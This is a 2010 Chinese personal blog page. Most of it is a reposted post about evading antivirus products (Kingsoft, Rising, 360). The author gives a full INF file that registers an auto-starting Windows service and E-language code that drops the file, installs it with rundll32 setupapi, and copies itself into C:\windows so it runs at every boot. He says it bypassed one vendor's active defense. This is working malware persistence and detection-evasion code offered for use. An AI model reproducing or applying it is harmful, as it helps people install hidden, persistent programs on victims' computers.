201007 - 王健宇's BLOG

重新开放博客啦

2010-7-31 王健宇

我不应该这样子！得面对，网络是自由的，不能因为一点事而把我的心血全部毁掉！想好了！重新开放博客

标签: 重开博客网络自由

评论(1) 浏览(2867)

转：利用INF安装服务启动及浅析瑞星行为检测、360主动防御（最后为本人看此文的免杀思路）

2010-7-27 王健宇转载

看完此文后写写我看后的想法。

首先谢谢本文作者给我提供了一个这么好的免杀思路，今天我测试了一下金山，过了主动防御，我等下会去测试瑞星和360。应该过的。

我的思路是这样子的，我只会易语言，就说说用易语言编写怎么过

首先我们新建一个文件

test.inf

[Version]
Signature="$WINDOWS NT$"

[DefaultInstall.Services]
AddService=Xiaoyu,,Add_Evil_Service ;服务名称

[Add_Evil_Service]
DisplayName=Xiaoyu ;显示名称
Description=Xiaoyu ;服务描述
ServiceType=0x10 ;服务类型
StartType=2 ;启动类型
ErrorControl=0 ;错误控制
ServiceBinary=cmd.exe /c start C:\windows\Xiaoyu.exe ;服务要加载的exe文件路径

然后把该文件添加到易语言的资源表，在图片或图片组新建一个图片1，__启动窗口_创建完毕后执行如下代码：

写到文件（“c:\test.inf”,#图片1）

运行（“rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 C:\test.inf ”）

复制文件 (取运行目录 () ＋ “\” ＋取执行文件名 (), “c:\windows\xiaoyu.exe”)

这样便成功添加一个系统服务项，每次开机都会自动运行！哈哈、我的思路到此为止，各位有别的语言的免杀思路请分享下。

附件有易语言源代码

阅读全文>>

评论(0) 浏览(9809)